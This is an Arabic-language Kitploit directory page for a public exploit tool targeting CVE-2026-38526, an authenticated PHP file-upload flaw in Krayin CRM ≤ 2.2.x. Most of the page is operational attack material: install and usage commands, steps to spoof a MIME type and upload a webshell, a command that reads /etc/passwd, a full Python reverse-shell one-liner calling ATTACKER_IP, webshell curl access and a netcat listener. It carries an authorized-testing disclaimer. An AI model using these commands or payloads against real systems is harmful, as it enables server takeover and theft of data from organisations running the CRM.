Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-38526 — استغلال آلي لـ Krayin CRM الإصدارات ≤ 2.2.x. | Kitploit
أدوات/GitHubGitHub/b0nyo/cve-2026-38526
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةالفريق الأحمر
GitHubb0nyo/cve-2026-38526

CVE-2026-38526

استغلال آلي لـ Krayin CRM الإصدارات ≤ 2.2.x.

عرض المستودع
منذ شهر واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-38526 - Krayin CRM PHP Upload RCE

أداة استغلال آلية لـ Krayin CRM ≤ 2.2.x. يستغل هذا السكربت ثغرة رفع ملفات غير مقيدة في نقطة نهاية TinyMCE (/admin/tinymce/upload)، ويتجاوز التحقق من نوع MIME عبر انتحال image/jpeg، ويرفع ويب شيل PHP، وينفّذ أوامر عشوائية بصلاحيات خادم الويب.


تفاصيل الثغرة

الخاصيةالقيمة
CVE IDCVE-2026-38526
البرنامج المتأثرKrayin CRM ≤ 2.2.x
نوع الثغرةرفع ملفات غير مقيّد → تنفيذ كود عن بُعد
المصادقةمطلوبة (أي حساب مسؤول صالح)
نقطة النهايةPOST /admin/tinymce/upload

المتطلبات الأساسية

  • Python 3.7+
  • بيانات اعتماد مسؤول صالحة لمثيل Krayin CRM المستهدف
  • وصول شبكي إلى التطبيق المستهدف
  • مكتبة requests

التثبيت

root@kitploit:~
git clone https://github.com/b0nyo/CVE-2026-38526.git
cd CVE-2026-38526
pip3 install -r requirements.txt

الاستخدام

root@kitploit:~
python3 CVE-2026-38526.py -i <TARGET_URL> -u <USERNAME> -p <PASSWORD> [-c <COMMAND>]

الوسائط

أمثلة

root@kitploit:~
# Basic check
python3 CVE-2026-38526.py -i http://target.com -u [email protected] -p "AdminPassword123!"

# Custom command
python3 CVE-2026-38526.py -i target.com -u [email protected] -p "AdminPassword123!" -c "cat /etc/passwd"

# Reverse shell
python3 CVE-2026-38526.py -i target.com -u [email protected] -p "AdminPassword123!" -c "python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ATTACKER_IP\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/bash\",\"-i\"])'"

خطوات الاستغلال

  1. المصادقة: استخراج رمز CSRF من صفحة تسجيل الدخول والمصادقة باستخدام بيانات الاعتماد المقدمة
  2. التحقق من الجلسة: استخراج رمز CSRF جديد من لوحة التحكم بعد المصادقة
  3. رفع الويب شيل: رفع حمولة PHP إلى /admin/tinymce/upload مع انتحال نوع MIME
  4. تنفيذ الأوامر: تنفيذ أوامر عشوائية عبر معامل GET الخاص بالويب شيل

مثال على المخرجات

root@kitploit:~
[*] Target: http://target.com
[*] Username: [email protected]

[*] Authenticating...
[+] Authentication successful

[*] Uploading webshell...
[+] Webshell uploaded: http://target.com/storage/tinymce/abc123def456.php
[+] CVE-2026-38526 CONFIRMED - Remote Code Execution

[*] Executing: id
[*] Output:
────────────────────────────────────────────────────────────────────
uid=33(www-data) gid=33(www-data) groups=33(www-data)
────────────────────────────────────────────────────────────────────

[*] Manual execution (curl):
curl 'http://target.com/storage/tinymce/abc123def456.php?cmd=id'

المشكلات الشائعة

فشل المصادقة: تحقق من صحة بيانات الاعتماد ومن أن الحساب موجود على النظام المستهدف.

فشل استخراج رمز CSRF: تأكد من أن الهدف يشغّل إصدار Krayin CRM القابل للاستغلال وأن نقطة نهاية تسجيل الدخول يمكن الوصول إليها.

قشرة عكسية لا تتصل: تأكد من أن المستمع (listener) يعمل (nc -lvnp <PORT>)، وأن قواعد جدار الحماية تسمح بالاتصالات الصادرة، وأن عنوان IP والمنفذ في الحمولة صحيحان.


إخلاء المسؤولية

هذه الأداة مقدمة حصريًا لأغراض الاختبارات الأمنية المصرّح بها والتعليم فقط. الوصول غير المصرّح به إلى الأنظمة الحاسوبية غير قانوني. يتحمل المستخدمون وحدهم مسؤولية ضمان حصولهم على التفويض المناسب قبل اختبار أي نظام مستهدف. لا يتحمل المؤلف أي مسؤولية عن سوء الاستخدام أو الأضرار الناجمة عن هذه الأداة.


المراجع

  • TREXNEGRO Security Advisory - CVE-2026-38526
  • Krayin CRM GitHub
  • OWASP - Unrestricted File Upload

المؤلف

b0nyo - تنفيذ الإثبات العملي (PoC)

  • GitHub

TREXNEGRO - اكتشاف الثغرة

  • Security Advisories
تنزيل الأداة
العلامةالوصفمثال
-iعنوان URL المستهدف (مع أو بدون http://)http://target.com أو target.com
-uالبريد الإلكتروني/اسم المستخدم للمسؤول[email protected]
-pكلمة مرور المسؤولAdminPassword123!
-cالأمر المراد تنفيذه (الافتراضي: id)whoami